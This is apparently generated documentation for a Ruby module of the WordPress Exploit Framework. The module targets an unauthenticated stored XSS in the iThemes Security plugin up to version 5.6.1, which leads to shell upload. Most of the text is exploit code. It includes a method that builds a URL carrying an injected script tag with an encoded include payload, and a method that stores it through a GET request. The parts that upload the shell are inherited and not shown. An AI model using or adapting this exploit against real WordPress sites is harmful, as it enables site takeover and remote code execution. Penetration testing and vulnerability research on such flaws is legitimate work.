class Wpxf::Exploit::IthemesSecurityStoredXssShellUpload

Public Class Methods

new() click to toggle source
Calls superclass method Wpxf::WordPress::StoredXss::new
# File lib/wpxf/modules/exploit/xss/stored/ithemes_security_stored_xss_shell_upload.rb, line 6
def initialize
  super

  update_info(
    name: 'iThemes Security <= 5.6.1 Unauthenticated Stored XSS Shell Upload',
    author: [
      'Slavco Mihajloski', # Disclosure
      'rastating'          # WPXF module
    ],
    references: [
      ['WPVDB', '8635'],
      ['URL', 'https://medium.com/websec/xss-vulnerability-in-ithemes-security-formerly-better-wp-security-5-6-1-2fba71f96f5d#.116tc5aol']
    ],
    date: 'Oct 06 2016'
  )
end

Public Instance Methods

check() click to toggle source
# File lib/wpxf/modules/exploit/xss/stored/ithemes_security_stored_xss_shell_upload.rb, line 23
def check
  check_plugin_version_from_readme('better-wp-security', '5.6.2')
end
expected_status_code_after_store() click to toggle source
# File lib/wpxf/modules/exploit/xss/stored/ithemes_security_stored_xss_shell_upload.rb, line 27
def expected_status_code_after_store
  404
end
generate_url() click to toggle source
# File lib/wpxf/modules/exploit/xss/stored/ithemes_security_stored_xss_shell_upload.rb, line 31
def generate_url
  normalize_uri(full_uri, "/#{Utility::Text.rand_alphanumeric(rand(10..20))}") + "?#{Utility::Text.rand_alpha(rand(1..5))}=<script>#{xss_ascii_encoded_include_script}</script>"
end
store_script() click to toggle source
# File lib/wpxf/modules/exploit/xss/stored/ithemes_security_stored_xss_shell_upload.rb, line 35
def store_script
  execute_get_request(
    url: generate_url
  )
end